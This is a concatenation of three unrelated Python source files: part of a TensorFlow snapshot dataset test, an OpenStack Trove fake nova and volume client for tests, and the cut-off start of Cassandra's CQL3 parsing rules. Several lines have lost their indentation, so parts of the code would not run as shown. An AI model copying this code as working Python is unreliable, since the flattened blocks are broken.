    dataset = dataset_ops.Dataset.from_tensor_slices([1.0])
    dataset = dataset.map(lambda x: gen_array_ops.broadcast_to(x, [1024, 1024]))
    dataset = dataset.repeat(10)
    dataset = dataset.apply(
        snapshot.snapshot(tmpdir, shard_size_bytes=10 * 1024 * 1024))
    next_fn = self.getNext(dataset)
    for _ in range(10):
      self.evaluate(next_fn())
    self.assertSnapshotDirectoryContains(tmpdir, 1, 1, 4)
  @combinations.generate(test_base.default_test_combinations())
  def testAdditionalOperationsAfterReadBack(self):
    # Transformations applied after snapshot() must operate on the
    # snapshot-read data.
    self.setUpTFRecord()
    filenames = self.test_filenames
    expected = [
        b"Record %d of file %d" % (r, f)  # pylint:disable=g-complex-comprehension
        for f in range(0, 10)
        for r in range(0, 10)
    ]
    tmpdir = self.makeSnapshotDirectory()
    dataset = core_readers._TFRecordDataset(filenames)
    dataset = dataset.apply(snapshot.snapshot(tmpdir))
    self.assertDatasetProduces(dataset, expected)
    # remove the original files and try to read the data back only from snapshot
    self.removeTFRecords()
    dataset2 = core_readers._TFRecordDataset(filenames)
    dataset2 = dataset2.apply(snapshot.snapshot(tmpdir))
    self.assertDatasetProduces(dataset2, expected)
    expected_after = [
        b"cord %d of file %d" % (r, f)  # pylint:disable=g-complex-comprehension
        for f in range(0, 10)
        for r in range(0, 10)
    ]
    dataset3 = core_readers._TFRecordDataset(filenames)
    dataset3 = dataset3.apply(snapshot.snapshot(tmpdir))
    dataset3 = dataset3.map(lambda x: string_ops.substr_v2(x, 2, 1000))
    self.assertDatasetProduces(dataset3, expected_after)
if __name__ == "__main__":
test.main()
| |
# Copyright 2010-2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from novaclient import exceptions as nova_exceptions
from oslo_log import log as logging
from trove.common.exception import PollTimeOut
from trove.common import instance as rd_instance
from trove.tests.fakes.common import authorize
import collections
import eventlet
import uuid
LOG = logging.getLogger(__name__)
# Candidate hypervisor host names for fake servers; FakeServer starts on
# the first entry (see FakeServer.host below).
FAKE_HOSTS = ["fake_host_1", "fake_host_2"]
class FakeFlavor(object):
    """In-memory stand-in for a single nova flavor record."""
    def __init__(self, id, disk, name, ram, ephemeral=0, vcpus=10):
        self.id = id
        self.disk = disk
        self.name = name
        self.ram = ram
        self.vcpus = vcpus
        self.ephemeral = ephemeral
    @property
    def links(self):
        """Fake 'self' and 'bookmark' link entries, nova-API style."""
        url = ("http://localhost:8774/v2/5064d71eb09c47e1956cf579822bae9a/"
               "flavors/%s") % self.id
        result = []
        for link_type in ['self', 'bookmark']:
            result.append({"href": url, "rel": link_type})
        return result
    @property
    def href_suffix(self):
        """Trailing path component used for inexact href matching."""
        return "flavors/%s" % self.id
class FakeFlavors(object):
    """In-memory stand-in for the nova flavors collection API."""
    def __init__(self):
        self.db = {}
        # (id, disk, name, ram[, ephemeral]) rows seeded at construction
        seed_rows = [
            (1, 0, "m1.tiny", 512),
            (2, 20, "m1.small", 2048),
            (3, 40, "m1.medium", 4096),
            (4, 80, "m1.large", 8192),
            (5, 160, "m1.xlarge", 16384),
            (6, 0, "m1.nano", 64),
            (7, 0, "m1.micro", 128),
            (8, 2, "m1.rd-smaller", 768),
            (9, 10, "tinier", 506),
            (10, 2, "m1.rd-tiny", 512),
            (11, 0, "eph.rd-tiny", 512, 1),
            (12, 20, "eph.rd-smaller", 768, 2),
            ("custom", 25, "custom.small", 512, 1),
        ]
        for row in seed_rows:
            self._add(*row)
    def _add(self, *args, **kwargs):
        # Register a new flavor keyed by its id.
        new_flavor = FakeFlavor(*args, **kwargs)
        self.db[new_flavor.id] = new_flavor
    def get(self, id):
        """Look up a flavor; numeric string ids are coerced to int keys."""
        try:
            id = int(id)
        except ValueError:
            pass
        if id in self.db:
            return self.db[id]
        raise nova_exceptions.NotFound(404, "Flavor id not found %s" % id)
    def get_by_href(self, href):
        """Find the flavor whose href suffix terminates the given href."""
        for flavor in self.db.values():
            # Use inexact match since faking the exact endpoints would be
            # difficult.
            if href.endswith(flavor.href_suffix):
                return flavor
        raise nova_exceptions.NotFound(404, "Flavor href not found %s" % href)
    def list(self):
        """Return every registered flavor."""
        return [self.get(flavor_id) for flavor_id in self.db]
class FakeServer(object):
    """In-memory stand-in for a nova server (instance).

    Status transitions are simulated with eventlet timers so callers can
    poll the fake just like the real API. Magic name suffixes
    (_ERROR_ON_DELETE, _RESIZE_TIMEOUT, _RESIZE_ERROR) trigger simulated
    failures.
    """

    # Class-level counter handing out sequential "local ids" for the
    # fake RdServers admin extension.
    next_local_id = 0

    def __init__(self, parent, owner, id, name, image_id, flavor_ref,
                 block_device_mapping, volumes):
        self.owner = owner  # This is a context.
        self.id = id
        self.parent = parent
        self.name = name
        self.image_id = image_id
        self.flavor_ref = flavor_ref
        self.old_flavor_ref = None
        self._current_status = "BUILD"
        self.volumes = volumes
        # This is used by "RdServers". Its easier to compute the
        # fake value in this class's initializer.
        self._local_id = FakeServer.next_local_id
        # Bug fix: bump the *class* counter. The previous
        # "self.next_local_id += 1" only shadowed it with an instance
        # attribute, so every server received local id 0.
        FakeServer.next_local_id += 1
        info_vols = []
        for volume in self.volumes:
            info_vols.append({'id': volume.id})
            volume.set_attachment(id)
            volume.schedule_status("in-use", 1)
        self.host = FAKE_HOSTS[0]
        self.old_host = None
        setattr(self, 'OS-EXT-AZ:availability_zone', 'nova')
        self._info = {'os:volumes': info_vols}

    @property
    def addresses(self):
        """Fixed fake network addresses."""
        return {"private": [{"addr": "123.123.123.123"}]}

    def confirm_resize(self):
        """Finish a resize; only valid from VERIFY_RESIZE."""
        if self.status != "VERIFY_RESIZE":
            raise RuntimeError("Not in resize confirm mode.")
        self._current_status = "ACTIVE"

    def revert_resize(self):
        """Undo a resize, restoring the previous host and flavor."""
        if self.status != "VERIFY_RESIZE":
            raise RuntimeError("Not in resize confirm mode.")
        self.host = self.old_host
        self.old_host = None
        self.flavor_ref = self.old_flavor_ref
        self.old_flavor_ref = None
        self._current_status = "ACTIVE"

    def reboot(self):
        """Simulate a reboot: REBOOT now, ACTIVE after one second."""
        LOG.debug("Rebooting server %s" % (self.id))

        def set_to_active():
            self._current_status = "ACTIVE"
            self.parent.schedule_simulate_running_server(self.id, 1.5)

        self._current_status = "REBOOT"
        eventlet.spawn_after(1, set_to_active)

    def delete(self):
        """Simulate deletion; *_ERROR_ON_DELETE servers fail exactly once."""
        self.schedule_status = []
        # TODO(pdmars): This is less than ideal, but a quick way to force it
        # into the error state before scheduling the delete.
        if (self.name.endswith("_ERROR_ON_DELETE") and
                self._current_status != "SHUTDOWN"):
            # Fail to delete properly the first time, just set the status
            # to SHUTDOWN and break. It's important that we only fail to
            # delete once in fake mode.
            self._current_status = "SHUTDOWN"
            return
        self._current_status = "SHUTDOWN"
        self.parent.schedule_delete(self.id, 1.5)

    @property
    def flavor(self):
        """Dict form of this server's flavor, resolved via its href."""
        return FLAVORS.get_by_href(self.flavor_ref).__dict__

    @property
    def links(self):
        """Self/bookmark links mimicking the REST representation."""
        url = "https://localhost:9999/v1.0/1234/instances/%s" % self.id
        return [{"href": url, "rel": link_type}
                for link_type in ['self', 'bookmark']]

    def migrate(self, force_host=None):
        """A migrate is a flavorless resize (always changes host)."""
        self.resize(None, force_host)

    def resize(self, new_flavor_id=None, force_host=None):
        """Simulate a resize; with no flavor id this acts as a migrate."""
        self._current_status = "RESIZE"
        if self.name.endswith("_RESIZE_TIMEOUT"):
            raise PollTimeOut()

        def set_to_confirm_mode():
            self._current_status = "VERIFY_RESIZE"

            def set_to_active():
                self.parent.schedule_simulate_running_server(self.id, 1.5)
            eventlet.spawn_after(1, set_to_active)

        def change_host():
            self.old_host = self.host
            if not force_host:
                self.host = [host for host in FAKE_HOSTS
                             if host != self.host][0]
            else:
                self.host = force_host

        def set_flavor():
            if self.name.endswith("_RESIZE_ERROR"):
                self._current_status = "ACTIVE"
                return
            if new_flavor_id is None:
                # Migrations are flavorless flavor resizes.
                # A resize MIGHT change the host, but a migrate
                # deliberately does.
                LOG.debug("Migrating fake instance.")
                eventlet.spawn_after(0.75, change_host)
            else:
                LOG.debug("Resizing fake instance.")
                self.old_flavor_ref = self.flavor_ref
                flavor = self.parent.flavors.get(new_flavor_id)
                self.flavor_ref = flavor.links[0]['href']
            eventlet.spawn_after(1, set_to_confirm_mode)

        eventlet.spawn_after(0.8, set_flavor)

    def schedule_status(self, new_status, time_from_now):
        """Makes a new status take effect at the given time."""
        def set_status():
            self._current_status = new_status
        eventlet.spawn_after(time_from_now, set_status)

    @property
    def status(self):
        return self._current_status

    @property
    def created(self):
        return "2012-01-25T21:55:51Z"

    @property
    def updated(self):
        return "2012-01-25T21:55:51Z"

    @property
    def tenant(self):  # This is on the RdServer extension type.
        return self.owner.tenant

    @property
    def tenant_id(self):
        return self.owner.tenant
# The global var contains the servers dictionary in use for the life of these
# tests.
FAKE_SERVERS_DB = {}
class FakeServers(object):
    """Fake nova servers manager backed by the module-global FAKE_SERVERS_DB."""
    def __init__(self, context, flavors):
        self.context = context
        self.db = FAKE_SERVERS_DB
        self.flavors = flavors
    def can_see(self, id):
        """Can this FakeServers, with its context, see some resource?"""
        server = self.db[id]
        return (self.context.is_admin or
                server.owner.tenant == self.context.tenant)
    def create(self, name, image_id, flavor_ref, files=None, userdata=None,
               block_device_mapping=None, volume=None, security_groups=None,
               availability_zone=None, nics=None, config_drive=False,
               scheduler_hints=None):
        """Create a fake server, optionally creating/attaching a volume.

        Magic inputs simulate failures: a name ending in 'SERVER_ERROR',
        availability_zone 'BAD_ZONE', or a first nic with port-id 'UNKNOWN'
        each raise ClientException after the server is stored.
        """
        id = "FAKE_%s" % uuid.uuid4()
        if volume:
            # NOTE: self.volumes is attached externally (see FakeClient,
            # which assigns its FakeVolumes manager onto this object).
            volume = self.volumes.create(volume['size'], volume['name'],
                                         volume['description'])
            while volume.status == "BUILD":
                eventlet.sleep(0.1)
            if volume.status != "available":
                LOG.info(_("volume status = %s") % volume.status)
                raise nova_exceptions.ClientException("Volume was bad!")
            mapping = "%s::%s:%s" % (volume.id, volume.size, 1)
            block_device_mapping = {'vdb': mapping}
            volumes = [volume]
            LOG.debug("Fake Volume Create %(volumeid)s with "
                      "status %(volumestatus)s" %
                      {'volumeid': volume.id, 'volumestatus': volume.status})
        else:
            volumes = self._get_volumes_from_bdm(block_device_mapping)
            for volume in volumes:
                volume.schedule_status('in-use', 1)
        server = FakeServer(self, self.context, id, name, image_id, flavor_ref,
                            block_device_mapping, volumes)
        self.db[id] = server
        if name.endswith('SERVER_ERROR'):
            raise nova_exceptions.ClientException("Fake server create error.")
        if availability_zone == 'BAD_ZONE':
            raise nova_exceptions.ClientException("The requested availability "
                                                  "zone is not available.")
        if nics:
            if 'port-id' in nics[0] and nics[0]['port-id'] == "UNKNOWN":
                raise nova_exceptions.ClientException("The requested "
                                                      "port-id is not "
                                                      "available.")
        server.schedule_status("ACTIVE", 1)
        LOG.info("FAKE_SERVERS_DB : %s" % str(FAKE_SERVERS_DB))
        return server
    def _get_volumes_from_bdm(self, block_device_mapping):
        """Resolve existing fake volumes referenced by a block device mapping."""
        volumes = []
        if block_device_mapping is not None:
            # block_device_mapping is a dictionary, where the key is the
            # device name on the compute instance and the mapping info is a
            # set of fields in a string, separated by colons.
            # For each device, find the volume, and record the mapping info
            # to another fake object and attach it to the volume
            # so that the fake API can later retrieve this.
            for device in block_device_mapping:
                mapping = block_device_mapping[device]
                (id, _type, size, delete_on_terminate) = mapping.split(":")
                volume = self.volumes.get(id)
                volume.mapping = FakeBlockDeviceMappingInfo(
                    id, device, _type, size, delete_on_terminate)
                volumes.append(volume)
        return volumes
    def get(self, id):
        """Return server ``id``; NotFound when missing or not visible."""
        if id not in self.db:
            LOG.error(_("Couldn't find server id %(id)s, collection=%(db)s") %
                      {'id': id, 'db': self.db})
            raise nova_exceptions.NotFound(404, "Not found")
        else:
            if self.can_see(id):
                return self.db[id]
            else:
                raise nova_exceptions.NotFound(404, "Bad permissions")
    def get_server_volumes(self, server_id):
        """Fake method we've added to grab servers from the volume."""
        return [volume.mapping
                for volume in self.get(server_id).volumes
                if volume.mapping is not None]
    def list(self):
        """Return all servers visible to this context."""
        return [v for (k, v) in self.db.items() if self.can_see(v.id)]
    def schedule_delete(self, id, time_from_now):
        """Remove server ``id`` from the shared db after a delay."""
        def delete_server():
            LOG.info(_("Simulated event ended, deleting server %s.") % id)
            del self.db[id]
        eventlet.spawn_after(time_from_now, delete_server)
    def schedule_simulate_running_server(self, id, time_from_now):
        """Mark the trove instance backing compute id ``id`` RUNNING later."""
        from trove.instance.models import DBInstance
        from trove.instance.models import InstanceServiceStatus
        def set_server_running():
            instance = DBInstance.find_by(compute_instance_id=id)
            LOG.debug("Setting server %s to running" % instance.id)
            status = InstanceServiceStatus.find_by(instance_id=instance.id)
            status.status = rd_instance.ServiceStatuses.RUNNING
            status.save()
        eventlet.spawn_after(time_from_now, set_server_running)
class FakeRdServer(object):
    """Decorates a FakeServer with the RdServers admin-extension fields."""
    def __init__(self, server):
        self.server = server
        self.deleted = False
        self.deleted_at = None  # Not sure how to simulate "True" for this.
        self.local_id = server._local_id
    def __getattr__(self, name):
        # Everything not defined here falls through to the wrapped server.
        return getattr(self.server, name)
class FakeRdServers(object):
    """Fake RdServers admin manager; wraps servers with extension data."""

    def __init__(self, servers):
        self.servers = servers

    def get(self, id):
        """Return the extension-wrapped server for ``id``."""
        return FakeRdServer(self.servers.get(id))

    def list(self):
        # Attach the extra Rd Server stuff to the normal server.
        wrapped = []
        for server in self.servers.list():
            wrapped.append(FakeRdServer(server))
        return wrapped
class FakeServerVolumes(object):
    """Fake API for listing the volumes attached to a server."""
    def __init__(self, context):
        self.context = context
    def get_server_volumes(self, server_id):
        """Return parsed block-device-mapping info for the given server."""
        class ServerVolumes(object):
            # Parses the "id:type:size:delete_on_terminate" string stored
            # under the 'vdb' device of the server's block device mapping.
            def __init__(self, block_device_mapping):
                LOG.debug("block_device_mapping = %s" %
                          block_device_mapping)
                device = block_device_mapping['vdb']
                (self.volumeId,
                 self.type,
                 self.size,
                 self.delete_on_terminate) = device.split(":")
        fake_servers = FakeServers(self.context, FLAVORS)
        server = fake_servers.get(server_id)
        return [ServerVolumes(server.block_device_mapping)]
class FakeVolume(object):
    """In-memory stand-in for a cinder volume."""

    def __init__(self, parent, owner, id, size, name,
                 description, volume_type):
        self.attachments = []
        self.parent = parent
        self.owner = owner  # This is a context.
        self.id = id
        self.size = size
        self.name = name
        self.description = description
        self._current_status = "BUILD"
        # For some reason we grab this thing from device then call it mount
        # point.
        self.device = "vdb"
        self.volume_type = volume_type

    def __repr__(self):
        return ("FakeVolume(id=%s, size=%s, name=%s, "
                "description=%s, _current_status=%s)" %
                (self.id, self.size, self.name,
                 self.description, self._current_status))

    @property
    def availability_zone(self):
        return "fake-availability-zone"

    @property
    def created_at(self):
        return "2001-01-01-12:30:30"

    def get(self, key):
        """Attribute access by name, mirroring the client's dict-ish API."""
        return getattr(self, key)

    def schedule_status(self, new_status, time_from_now):
        """Makes a new status take effect at the given time."""
        def set_status():
            self._current_status = new_status
        eventlet.spawn_after(time_from_now, set_status)

    def set_attachment(self, server_id):
        """Fake method we've added to set attachments. Idempotent."""
        if any(a['server_id'] == server_id for a in self.attachments):
            return  # Already attached; do nothing.
        self.attachments.append({'server_id': server_id,
                                 'device': self.device})

    @property
    def status(self):
        return self._current_status
class FakeBlockDeviceMappingInfo(object):
    """Record describing how a fake volume is mapped onto a fake server."""
    def __init__(self, id, device, _type, size, delete_on_terminate):
        self.volumeId = id
        self.device = device
        self.type = _type
        self.size = size
        self.delete_on_terminate = delete_on_terminate
FAKE_VOLUMES_DB = {}
class FakeVolumes(object):
    """Fake cinder volume manager over the module-global FAKE_VOLUMES_DB."""

    def __init__(self, context):
        self.context = context
        self.db = FAKE_VOLUMES_DB

    def can_see(self, id):
        """Can this FakeVolumes, with its context, see some resource?"""
        volume = self.db[id]
        return (self.context.is_admin or
                volume.owner.tenant == self.context.tenant)

    def get(self, id):
        """Return volume ``id``; NotFound when missing or not visible."""
        if id not in self.db:
            LOG.error(_("Couldn't find volume id %(id)s, collection=%(db)s") %
                      {'id': id, 'db': self.db})
            raise nova_exceptions.NotFound(404, "Not found")
        else:
            if self.can_see(id):
                return self.db[id]
            else:
                raise nova_exceptions.NotFound(404, "Bad permissions")

    def create(self, size, name=None, description=None, volume_type=None):
        """Create a fake volume; magic sizes simulate failures."""
        id = "FAKE_VOL_%s" % uuid.uuid4()
        volume = FakeVolume(self, self.context, id, size, name,
                            description, volume_type)
        self.db[id] = volume
        if size == 9:
            # Magic size: the volume build fails shortly after creation.
            volume.schedule_status("error", 2)
        elif size == 13:
            # Magic size: the create call itself fails.
            raise Exception("No volume for you!")
        else:
            volume.schedule_status("available", 2)
        LOG.debug("Fake volume created %(volumeid)s with "
                  "status %(volumestatus)s" %
                  {'volumeid': volume.id, 'volumestatus': volume.status})
        LOG.info("FAKE_VOLUMES_DB : %s" % FAKE_VOLUMES_DB)
        return volume

    def list(self, detailed=True):
        """Return every volume; ``detailed`` is accepted but unused."""
        return [self.db[key] for key in self.db]

    def extend(self, volume_id, new_size):
        """Grow a detached (available) volume after a short delay."""
        LOG.debug("Resize volume id (%(volumeid)s) to size (%(size)s)" %
                  {'volumeid': volume_id, 'size': new_size})
        volume = self.get(volume_id)
        if volume._current_status != 'available':
            # Bug fix: the message previously claimed "expected 'in-use'"
            # although the check requires 'available'.
            raise Exception("Invalid volume status: "
                            "expected 'available' but was '%s'" %
                            volume._current_status)

        def finish_resize():
            volume.size = new_size
        eventlet.spawn_after(1.0, finish_resize)

    def delete_server_volume(self, server_id, volume_id):
        """Detach: in-use -> available after a short delay."""
        volume = self.get(volume_id)
        if volume._current_status != 'in-use':
            raise Exception("Invalid volume status: "
                            "expected 'in-use' but was '%s'" %
                            volume._current_status)

        def finish_detach():
            volume._current_status = "available"
        eventlet.spawn_after(1.0, finish_detach)

    def create_server_volume(self, server_id, volume_id, device_path):
        """Attach: available -> in-use after a short delay."""
        volume = self.get(volume_id)
        if volume._current_status != "available":
            raise Exception("Invalid volume status: "
                            "expected 'available' but was '%s'" %
                            volume._current_status)

        def finish_attach():
            volume._current_status = "in-use"
        eventlet.spawn_after(1.0, finish_attach)
class FakeAccount(object):
    """Fake account summary: an id plus dicts describing its servers."""

    def __init__(self, id, servers):
        self.id = id
        self.servers = self._servers_to_dict(servers)

    def _servers_to_dict(self, servers):
        # Reduce each server to the few fields the account API exposes.
        return [{'id': server.id,
                 'name': server.name,
                 'status': server.status,
                 'host': server.host}
                for server in servers]
class FakeAccounts(object):
    """Fake os-accounts admin API over the shared fake servers store."""
    def __init__(self, context, servers):
        self.context = context
        self.db = FAKE_SERVERS_DB
        self.servers = servers
    def _belongs_to_tenant(self, tenant, id):
        # True when server ``id`` is owned by the given tenant.
        server = self.db[id]
        return server.tenant == tenant
    def get_instances(self, id):
        """Return a FakeAccount summarizing tenant ``id``'s servers (admin only)."""
        authorize(self.context)
        servers = [v for (k, v) in self.db.items()
                   if self._belongs_to_tenant(id, v.id)]
        return FakeAccount(id, servers)
FLAVORS = FakeFlavors()
class FakeHost(object):
    """Fake compute host aggregating the fake servers scheduled onto it."""
    def __init__(self, name, servers):
        self.name = name
        self.servers = servers
        self.instances = []
        self.percentUsed = 0
        self.totalRAM = 0
        self.usedRAM = 0
    @property
    def instanceCount(self):
        # Number of instances recorded by the last recalc().
        return len(self.instances)
    def recalc(self):
        """
        This fake-mode exclusive method recalculates the fake data this
        object passes back.
        """
        self.instances = []
        self.percentUsed = 0
        self.totalRAM = 32000 # 16384
        self.usedRAM = 0
        for server in self.servers.list():
            print(server)
            if server.host != self.name:
                print("\t...not on this host.")
                continue
            self.instances.append({
                'uuid': server.id,
                'name': server.name,
                'status': server.status
            })
            # Flavor refs may be full hrefs or bare flavor ids.
            if (str(server.flavor_ref).startswith('http:') or
                str(server.flavor_ref).startswith('https:')):
                flavor = FLAVORS.get_by_href(server.flavor_ref)
            else:
                flavor = FLAVORS.get(server.flavor_ref)
            ram = flavor.ram
            self.usedRAM += ram
        decimal = float(self.usedRAM) / float(self.totalRAM)
        self.percentUsed = int(decimal * 100)
class FakeHosts(object):
    """Fake host manager over the fixed FAKE_HOSTS list."""

    def __init__(self, servers):
        # Use an ordered dict to make the results of the fake api call
        # return in the same order for the example generator.
        self.hosts = collections.OrderedDict()
        for host_name in FAKE_HOSTS:
            self.add_host(FakeHost(host_name, servers))

    def add_host(self, host):
        """Register ``host`` under its name and return it."""
        self.hosts[host.name] = host
        return host

    def get(self, name):
        """Return host ``name`` with freshly recalculated stats."""
        try:
            host = self.hosts[name]
            host.recalc()
            return host
        except KeyError:
            raise nova_exceptions.NotFound(404, "Host not found %s" % name)

    def list(self):
        """Return every host, each with freshly recalculated stats."""
        all_hosts = list(self.hosts.values())
        for host in all_hosts:
            host.recalc()
        return all_hosts
class FakeRdStorage(object):
    """Fake storage device with canned capacity/provision statistics."""

    def __init__(self, name):
        self.name = name
        self.type = ""
        self.used = 0
        self.capacity = {}
        self.provision = {}

    def recalc(self):
        """Populate the canned fake statistics."""
        self.type = "test_type"
        self.used = 10
        self.capacity.update(total=100, available=90)
        self.provision.update(total=50, available=40, percent=10)
class FakeRdStorages(object):
    """Fake storage manager exposing a single canned storage device."""

    def __init__(self):
        self.storages = {}
        self.add_storage(FakeRdStorage("fake_storage"))

    def add_storage(self, storage):
        """Register ``storage`` under its name and return it."""
        self.storages[storage.name] = storage
        return storage

    def list(self):
        """Return all storages after refreshing their fake stats."""
        all_storages = list(self.storages.values())
        for storage in all_storages:
            storage.recalc()
        return all_storages
class FakeSecurityGroup(object):
    """Fake security group holding an ordered list of rules."""

    def __init__(self, name=None, description=None, context=None):
        self.name = name
        self.description = description
        self.id = "FAKE_SECGRP_%s" % uuid.uuid4()
        # Bug fix: this must be a list — add_rule() appends to it; the
        # original initialized a dict, so add_rule always raised
        # AttributeError.
        self.rules = []

    def get_id(self):
        """Return the group's generated id."""
        return self.id

    def add_rule(self, fakeSecGroupRule):
        """Append a rule and return the full rule list."""
        self.rules.append(fakeSecGroupRule)
        return self.rules

    def get_rules(self):
        """Concatenate each rule's data() into a single result.

        NOTE(review): this assumes rule.data() supports '+' with a string;
        FakeSecurityGroupRule.data() returns a dict — confirm intended use.
        """
        result = ""
        for rule in self.rules:
            result = result + rule.data()
        return result

    def data(self):
        """REST-style dict representation of the group."""
        return {
            'id': self.id,
            'name': self.name,
            'description': self.description
        }
class FakeSecurityGroups(object):
    """Fake security-group manager; groups live only in this instance."""

    def __init__(self, context=None):
        self.context = context
        self.securityGroups = {}

    def create(self, name=None, description=None):
        """Create, register and return a new fake security group."""
        group = FakeSecurityGroup(name, description)
        self.securityGroups[group.get_id()] = group
        return group

    def delete(self, group_id):
        # Deliberate no-op in fake mode.
        pass

    def list(self):
        # Not implemented by the fake.
        pass
class FakeSecurityGroupRule(object):
    """Fake security group rule with a random unique id."""

    def __init__(self, ip_protocol=None, from_port=None, to_port=None,
                 cidr=None, parent_group_id=None, context=None):
        self.group_id = parent_group_id
        self.protocol = ip_protocol
        self.from_port = from_port
        self.to_port = to_port
        self.cidr = cidr
        self.context = context
        self.id = "FAKE_SECGRP_RULE_%s" % uuid.uuid4()

    def get_id(self):
        """Return the rule's generated id."""
        return self.id

    def data(self):
        """REST-style dict representation of the rule."""
        return dict(id=self.id,
                    group_id=self.group_id,
                    protocol=self.protocol,
                    from_port=self.from_port,
                    to_port=self.to_port,
                    cidr=self.cidr)
class FakeSecurityGroupRules(object):
    """Fake security-group-rule manager."""

    def __init__(self, context=None):
        self.context = context
        self.securityGroupRules = {}

    def create(self, parent_group_id, ip_protocol, from_port, to_port, cidr):
        """Create, register and return a new fake rule."""
        rule = FakeSecurityGroupRule(ip_protocol, from_port, to_port,
                                     cidr, parent_group_id)
        self.securityGroupRules[rule.get_id()] = rule
        return rule

    def delete(self, id):
        # Removing an unknown id is a silent no-op, as before.
        self.securityGroupRules.pop(id, None)
class FakeServerGroup(object):
    """Fake nova server group (scheduling policies container)."""

    def __init__(self, name=None, policies=None, context=None):
        self.name = name
        # Bug fix: the original assigned "self.description = description",
        # but no such parameter exists — every instantiation raised
        # NameError. data() never exposed a description, so the line is
        # simply dropped.
        self.id = "FAKE_SRVGRP_%s" % uuid.uuid4()
        self.policies = policies or {}

    def get_id(self):
        """Return the group's generated id."""
        return self.id

    def data(self):
        """REST-style dict representation of the group."""
        return {
            'id': self.id,
            'name': self.name,
            'policies': self.policies
        }
class FakeServerGroups(object):
    """Fake server-group manager."""

    def __init__(self, context=None):
        self.context = context
        self.server_groups = {}

    def create(self, name=None, policies=None):
        """Create, register and return a new fake server group."""
        group = FakeServerGroup(name, policies, context=self.context)
        self.server_groups[group.get_id()] = group
        return group

    def delete(self, group_id):
        # Deliberate no-op in fake mode.
        pass

    def list(self):
        """Return the id -> group mapping (as the original did)."""
        return self.server_groups
class FakeClient(object):
    """Aggregate fake nova client wiring together all the fake managers."""
    def __init__(self, context):
        self.context = context
        self.flavors = FLAVORS
        self.servers = FakeServers(context, self.flavors)
        self.volumes = FakeVolumes(context)
        # FakeServers.create() needs a volumes manager; share this one.
        self.servers.volumes = self.volumes
        self.accounts = FakeAccounts(context, self.servers)
        self.rdhosts = FakeHosts(self.servers)
        self.rdstorage = FakeRdStorages()
        self.rdservers = FakeRdServers(self.servers)
        self.security_groups = FakeSecurityGroups(context)
        self.security_group_rules = FakeSecurityGroupRules(context)
        self.server_groups = FakeServerGroups(context)
    def get_server_volumes(self, server_id):
        """Delegate to the fake servers manager."""
        return self.servers.get_server_volumes(server_id)
    def rescan_server_volume(self, server, volume_id):
        # No-op in fake mode; just log that the call happened.
        LOG.info("FAKE rescanning volume.")
CLIENT_DATA = {}
def get_client_data(context):
    """Return (and memoize per context) the fake nova/volume client pair."""
    if context not in CLIENT_DATA:
        nova = FakeClient(context)
        volume = FakeClient(context)
        # The fake volume client's ``servers`` points at the whole nova
        # client object (preserving the original wiring).
        volume.servers = nova
        CLIENT_DATA[context] = {
            'nova': nova,
            'volume': volume
        }
    return CLIENT_DATA[context]
def fake_create_nova_client(context):
    """Return the memoized fake nova client for ``context``."""
    return get_client_data(context)['nova']
def fake_create_nova_volume_client(context):
    """Return the memoized fake volume client for ``context``."""
    return get_client_data(context)['volume']
def fake_create_cinder_client(context):
    """Return the memoized fake volume client for ``context`` (cinder API)."""
    return get_client_data(context)['volume']
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from warnings import warn
from .cqlhandling import CqlParsingRuleSet, Hint
from cql.cqltypes import (cql_types, lookup_casstype, CompositeType, UTF8Type,
ColumnToCollectionType, CounterColumnType, DateType)
from . import helptopics
simple_cql_types = set(cql_types)
simple_cql_types.difference_update(('set', 'map', 'list'))
cqldocs = helptopics.CQL3HelpTopics()
try:
import json
except ImportError:
import simplejson as json
# temporarily have this here until a newer cassandra-dbapi2 is bundled with C*
class TimestampType(DateType):
    """Alias of DateType standing in for the newer driver's timestamp type."""
    pass
class UnexpectedTableStructure(UserWarning):
    """Warning raised when a table's layout doesn't map cleanly to CQL."""

    def __init__(self, msg):
        self.msg = msg

    def __str__(self):
        return ('Unexpected table structure; may not translate correctly to '
                'CQL. %s' % self.msg)
SYSTEM_KEYSPACES = ('system', 'system_traces', 'system_auth')
# Bug fix: ('system') is just a parenthesized string, so membership tests
# matched any substring of "system" (e.g. 'sys'). The trailing comma makes
# it a real one-element tuple.
NONALTERBALE_KEYSPACES = ('system',)
class Cql3ParsingRuleSet(CqlParsingRuleSet):
    """CQL3-specific parsing rules: keywords, table options and quoting."""
    # Every keyword the CQL3 parser recognizes (reserved and unreserved).
    keywords = set((
        'select', 'from', 'where', 'and', 'key', 'insert', 'update', 'with',
        'limit', 'using', 'use', 'count', 'set',
        'begin', 'apply', 'batch', 'truncate', 'delete', 'in', 'create',
        'keyspace', 'schema', 'columnfamily', 'table', 'index', 'on', 'drop',
        'primary', 'into', 'values', 'timestamp', 'ttl', 'alter', 'add', 'type',
        'compact', 'storage', 'order', 'by', 'asc', 'desc', 'clustering',
        'token', 'writetime', 'map', 'list', 'to', 'custom', 'if', 'not'
    ))
    # Keywords that may still be used as identifiers without quoting.
    unreserved_keywords = set((
        'key', 'clustering', 'ttl', 'compact', 'storage', 'type', 'values', 'custom', 'exists'
    ))
    # (CQL3 option name, schema_columnfamilies column name or None if same)
    columnfamily_layout_options = (
        ('bloom_filter_fp_chance', None),
        ('caching', None),
        ('comment', None),
        ('dclocal_read_repair_chance', 'local_read_repair_chance'),
        ('gc_grace_seconds', None),
        ('index_interval', None),
        ('read_repair_chance', None),
        ('replicate_on_write', None),
        ('populate_io_cache_on_flush', None),
        ('default_time_to_live', None),
        ('speculative_retry', None),
        ('memtable_flush_period_in_ms', None),
    )
    columnfamily_layout_map_options = (
